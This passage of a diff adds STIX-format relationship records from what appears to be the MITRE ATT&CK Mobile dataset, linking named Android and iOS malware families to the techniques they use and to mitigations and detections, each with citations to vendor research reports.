Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:37.086Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can check to see if WiFi is enabled.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9d264e84-27b2-4867-82c8-55486a969d7c", + "type": "relationship", + "created": "2020-12-17T20:15:22.489Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.489Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can obtain a list of running processes.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e2ee6825-43c2-441f-ba96-404a330a9059", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:51.590Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) steals contacts from the victim user's device.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6c0105f3-e919-499d-b080-d127394d2837", + "created": "2022-03-30T18:14:23.210Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Typically, insecure or malicious 
configuration settings are not installed without the user's consent. Users should be advised not to install unexpected configuration settings (CA certificates, iOS Configuration Profiles, Mobile Device Management server provisioning). ", + "modified": "2022-03-30T18:14:23.210Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--92879f0e-d1db-4407-9cc6-c1dbcc47caea", + "created": "2019-10-18T14:52:53.193Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect devices with unauthorized or unsafe modifications. 
", + "modified": "2022-03-30T20:07:50.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c034c66-18ad-4b30-9f17-ed574c10918f", + "created": "2023-03-20T18:56:20.203Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:20.203Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fa13936f-9b9d-4b48-a33f-81044f6cdedb", + "created": "2020-09-15T15:18:12.466Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. 
Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:17:07.033Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) exfiltrates data using HTTP requests.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76", + "created": "2020-12-17T20:15:22.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. 
Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:35:41.700Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has collected all outgoing phone numbers that start with “86”.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--30ab9ce7-5369-402a-94ee-f8452642acb9", + "created": "2022-03-30T19:50:37.739Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:50:37.739Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34351abd-1f58-420a-a893-ad822839815d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. 
Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:33:36.294Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) captures call logs.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1fdad4b5-18a1-4fbf-81ce-861feaf2bbdd", + "type": "relationship", + "created": "2020-04-08T18:55:29.205Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + }, + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." 
+ } + ], + "modified": "2021-01-20T16:01:19.565Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can exfiltrate files encrypted with the ransomware module from the device and can modify external storage.(Citation: Cofense Anubis)(Citation: Trend Micro Anubis) ", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e458d77-c856-4b02-82a7-50947b232dc3", + "type": "relationship", + "created": "2021-10-01T14:42:49.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-06T15:32:46.533Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can download a payload or updates from either its C2 server or email attachments in the adversary’s inbox.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f989562f-41a8-46d3-94ba-fca7269ae592", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.072Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is delivered via a a watering hole website that mimics the third-party Android app store APKMonk. 
In at least one case, the watering hole URL was distributed through Facebook Messenger.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d2c7743-fc75-4524-b217-13867ca1dd10", + "created": "2019-09-03T20:08:00.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:32:04.659Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) can collect the contact list.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3644d1dd-8d9f-4a89-a618-c6b22c2a1a96", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. 
Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:48.463Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses HTTP requests for C2 communication.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f973c3c-45f8-432a-9859-e8749f2e7418", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.848Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses sensitive data in files, such as messages stored by the WhatsApp, Facebook, and Twitter applications. 
It also has the ability to access arbitrary filenames and retrieve directory listings.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7793a066-d72b-4a60-9579-e16369ea7185", + "created": "2023-03-20T18:57:55.221Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:55.221Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b98fa6ef-a5f2-4867-8108-8daf8534cc3c", + "created": "2022-04-01T16:51:20.688Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should scrutinize every device administration permission request. 
If the request is not expected or the user does not recognize the application, the application should be uninstalled immediately.", + "modified": "2022-04-01T16:51:20.688Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d84604bc-2314-4340-b9c1-b1265c0f6c37", + "type": "relationship", + "created": "2020-05-07T15:24:49.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-05-27T13:23:34.544Z", + "description": "Many vulnerabilities related to injecting code into existing applications have been patched in previous Android releases.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb", + "type": "relationship", + "created": "2020-12-18T20:14:47.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.412Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has included native modules.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8bc0abc2-a413-4c05-b2b8-2a92d9cc5556", + "created": "2019-09-04T15:38:56.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + }, + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. 
Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:44:31.870Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is capable of hiding SuperSU's icon if it is installed and visible.(Citation: FortiGuard-FlexiSpy) [FlexiSpy](https://attack.mitre.org/software/S0408) can also hide its own icon to make detection and the uninstallation process more difficult.(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5012c647-9b58-4a4f-b64f-468c9b76a60c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:53:41.561Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can view contacts.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d562ed4d-ac4d-476b-872e-9e228c580889", + "type": "relationship", + "created": "2020-11-20T16:37:28.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T16:37:28.506Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can obtain a list of installed applications.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eceeb39e-887c-4a9b-a93b-a6fd768e455a", + "type": "relationship", + "created": "2020-07-15T20:20:59.186Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.186Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access device configuration information and status, including Android version, battery level, device model, country, and SIM operator.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69bb264a-3f44-4132-9248-dd80a9f5efa2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:17:53.923Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) locks the device if it is granted admin permissions, displaying a message demanding a ransom payment.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cd6a9777-a8fd-43ca-91dc-cafc7d4b7df3", + "type": "relationship", + "created": 
"2020-01-27T17:05:58.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.215Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain a list of running processes.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb", + "type": "relationship", + "created": "2020-12-17T20:15:22.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
